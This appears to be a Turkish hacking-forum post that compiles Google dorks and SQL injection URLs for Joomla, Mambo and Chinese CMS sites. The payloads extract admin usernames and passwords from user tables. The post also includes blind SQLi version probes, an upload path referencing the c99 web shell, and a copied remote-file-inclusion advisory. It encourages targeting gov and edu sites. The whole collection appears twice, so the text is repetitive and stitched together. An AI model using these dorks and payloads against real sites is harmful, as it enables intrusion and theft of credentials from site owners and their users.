Aratilacak Kod: allinurl: "com_d3000"
eklenecek kod:index.php?option=com_d3000&task=showarticles&i d=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
googlede aratilacak kod:
inurl:"com_volunteer"
Site sonuna eklenecek kod:
p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE
p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE
Imagevue gallery Acigi
arama kodu : imagevue gallery
siteadi/com/admin/upload.php?path=c99?
Ve Karsiniza Upload Bolumu Cikior
# Title: Joomla Component com_doqment (cid) SQL Injection Vulnerability
# EDB-ID: 10965
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Gamoscu
# Published: 2010-01-03
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print
?#############################################################################
# #
# Joomla Component com_doqment (cid) SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Author : Gamoscu
[~] Site : www.1923turk.biz
[~] Site : [URL="http://www.1923turk.com"]www.1923turk.com [url]https://tik.lat/iGXYQ
########################################
[~] DORK: inurl:com_doqment
########################################
[~] Exploit: /index.php?option=com_doqment&cid=[SQL]
[~] Example: /index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
########################################
Çin sitelerinde bulunan güncel SQL İnjection Exploit
Google Aratma;
Linkleri görebilmek için ÜYE olmalısınız.
Exploit ;
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
Örnek Site ;
Linkleri görebilmek için ÜYE olmalısınız. rom+cms_admin+limit+0,1--
Bu Arada Google Dork ;
inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.
#############################################################################################################
## Mambo com_koesubmit 1.0.0 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : https://tik.lat/pre4V ##
## Date : Friday, Semptember 18, 2009 ##
## ------------------------------------------------------------------------------------------------------- ##
## _______ __ __ ______ __ ##
##|_ _|.-----..--| |.-----..-----..-----..-----.|__|.---.-..-----. | |.-----..--| |.-----..----.##
## _| |_ | || _ || _ || || -__||__ --|| || _ || | | ---|| _ || _ || -__|| _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__| ##
## ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################
[ Software Information ]
[+] Software : K?hn 1st-Submit ( com_koesubmit )
[+] Version : 1.0
[+] Vendor : www.alibasta.de [url]https://tik.lat/1D5NN ?
[ Demo ]
https://tik.lat/s3ZZv =
#############################################################################################################
[ HOLA !!! ]
[~] M3NW5, Gonzhack, MISTERSAINT, Cyb3r_tr0n, M364TR0N, v3n0m, Awan Bejat, Plaque, rey_cute
[~] Den Bayan, Den Awink, Chercut, NoGe, kecemplungkalen, Aries Deris, Xshadow, Jack-, Yadoy666 + Tante Miya
[~] kaMtiEz, arianom, RoNz, tiw0L, and You !!!
[ SHOUT ]
Selamat Idul Fitri 1930 H
Minal aidzin Wal faidzin, Mohon Maaf Lahir Batin
AND FOR YOU ALL MALINGSIAL, YOU'RE TRULY THIEF IN ASIA.
# milw0rm.com [2009-09-17]
eklenecek kod:index.php?option=com_d3000&task=showarticles&i d=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
googlede aratilacak kod:
inurl:"com_volunteer"
Site sonuna eklenecek kod:
p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE
p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE
Imagevue gallery Acigi
arama kodu : imagevue gallery
siteadi/com/admin/upload.php?path=c99?
Ve Karsiniza Upload Bolumu Cikior
# Title: Joomla Component com_doqment (cid) SQL Injection Vulnerability
# EDB-ID: 10965
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Gamoscu
# Published: 2010-01-03
# Verified: yes
# Download Exploit Code
# Download N/A
view source
?#############################################################################
# #
# Joomla Component com_doqment (cid) SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Author : Gamoscu
[~] Site : www.1923turk.biz
[~] Site : [URL="http://www.1923turk.com"]www.1923turk.com [url]https://tik.lat/iGXYQ
########################################
[~] DORK: inurl:com_doqment
########################################
[~] Exploit: /index.php?option=com_doqment&cid=[SQL]
[~] Example: /index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
########################################
Çin sitelerinde bulunan güncel SQL İnjection Exploit
Google Aratma;
Linkleri görebilmek için ÜYE olmalısınız.
Exploit ;
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
Örnek Site ;
Linkleri görebilmek için ÜYE olmalısınız. rom+cms_admin+limit+0,1--
Bu Arada Google Dork ;
inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.
#############################################################################################################
## Mambo com_koesubmit 1.0.0 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : https://tik.lat/pre4V ##
## Date : Friday, Semptember 18, 2009 ##
## ------------------------------------------------------------------------------------------------------- ##
## _______ __ __ ______ __ ##
##|_ _|.-----..--| |.-----..-----..-----..-----.|__|.---.-..-----. | |.-----..--| |.-----..----.##
## _| |_ | || _ || _ || || -__||__ --|| || _ || | | ---|| _ || _ || -__|| _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__| ##
## ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################
[ Software Information ]
[+] Software : K?hn 1st-Submit ( com_koesubmit )
[+] Version : 1.0
[+] Vendor : www.alibasta.de [url]https://tik.lat/1D5NN ?
[ Demo ]
https://tik.lat/s3ZZv =
#############################################################################################################
[ HOLA !!! ]
[~] M3NW5, Gonzhack, MISTERSAINT, Cyb3r_tr0n, M364TR0N, v3n0m, Awan Bejat, Plaque, rey_cute
[~] Den Bayan, Den Awink, Chercut, NoGe, kecemplungkalen, Aries Deris, Xshadow, Jack-, Yadoy666 + Tante Miya
[~] kaMtiEz, arianom, RoNz, tiw0L, and You !!!
[ SHOUT ]
Selamat Idul Fitri 1930 H
Minal aidzin Wal faidzin, Mohon Maaf Lahir Batin
AND FOR YOU ALL MALINGSIAL, YOU'RE TRULY THIEF IN ASIA.
# milw0rm.com [2009-09-17]
Son düzenleme:
